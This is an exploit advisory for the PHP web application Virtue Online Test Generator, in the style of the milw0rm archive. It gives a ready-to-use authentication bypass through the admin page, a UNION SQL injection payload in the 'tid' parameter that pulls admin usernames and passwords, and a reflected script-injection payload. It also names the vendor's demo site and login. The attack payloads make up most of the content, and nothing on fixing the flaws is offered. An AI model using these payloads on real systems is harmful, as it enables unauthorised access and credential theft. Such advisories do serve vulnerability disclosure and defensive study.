Virtue Online Test Generator - Authentication Bypass / SQL Injection / Cross-Site Scripting



Author:

HxH

Type:

webapps


Platform:

PHP

Date:

2009-06-26


+===================================================================================+
|                                                                                   |
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities         |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Author.: HxH                                                                      |
| Contact: HxH[at]live[dot]at                                                       |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Script.: Virtue Online Test Generator                                             |
| Home...: http://www.virtuenetz.com/virtue_test_generator.php                      |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Exploit: After user login                                                         |
|                                                                                   |
| [+] Auth Bypass                                                                   |
|                                                                                   |
| http://[website]/[script]/admin/index.php                                         |
|                                                                                   |
| [+] SQLi                                                                          |
|                                                                                   |
| http://[website]/[script]/text.php?tid=[SQL]                                      |
|                                                                                   |
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin--         |
|                                                                                   |
| [+] XSS                                                                           |
|                                                                                   |
| http://[website]/[script]/text.php?tid=<script>alert(1)</script>                  |
|                                                                                   |
+-----------------------------------------------------------------------------------+
|                                                                                   |
| Demo...: http://www.virtuenetz.com/exam                                           |
| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo                                   |
|                                                                                   |
+===================================================================================+
|                                                                                   |
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist                                         |
|                                                                                   |
+===================================================================================+

# milw0rm.com [2009-06-26]